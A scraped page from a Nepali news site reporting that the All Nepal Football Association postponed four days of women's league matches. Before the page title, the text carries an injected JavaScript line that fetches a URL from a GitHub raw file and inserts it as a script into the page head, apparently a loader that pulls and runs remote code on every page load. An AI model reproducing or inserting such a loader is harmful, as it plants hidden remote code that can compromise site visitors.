;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); एन्फाले चार दिनका लागि महिला लिग फुटबल स्थगित गर्यो – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • एन्फाले चार दिनका लागि महिला लिग फुटबल स्थगित गर्यो
खेलकुद

एन्फाले चार दिनका लागि महिला लिग फुटबल स्थगित गर्यो

माघ १०
काठमाडौं । अखिल नेपाल फुटबल संघ (एन्फा)ले महिला लिग फुटबल अन्तर्गत आजदेखि मंगलबारसम्मका खेल स्थगित गरेको छ ।

चार दिनका लागि तय भएका खेलहरु स्थगित भएका र बिहीबारदेखि नियमित तालिकाअनुसार खेल खेलाइने एन्फाले जनाएको छ । चार दिनको खेल स्थगित भएपछि महिला लिगको तालिका पनि परिवर्तन हुने भएको छ ।

तालिकाअनुसार आज विभागीय टिम त्रिभुवन आर्मी र वालिङ नगरपालिकाबीचको खेल हुने भनिएको थियो ।

यस्तै अर्को खेलमा अर्को विभागीय टिम एपीएफ र विराटनगरबीचको खेल हुने तालिका रहेको थियो । तर आजका लागि तय गरिएका दुवै खेल स्थगित भएका एन्फाले जनाएको छ ।

फेसबुक प्रतिक्रियाहरु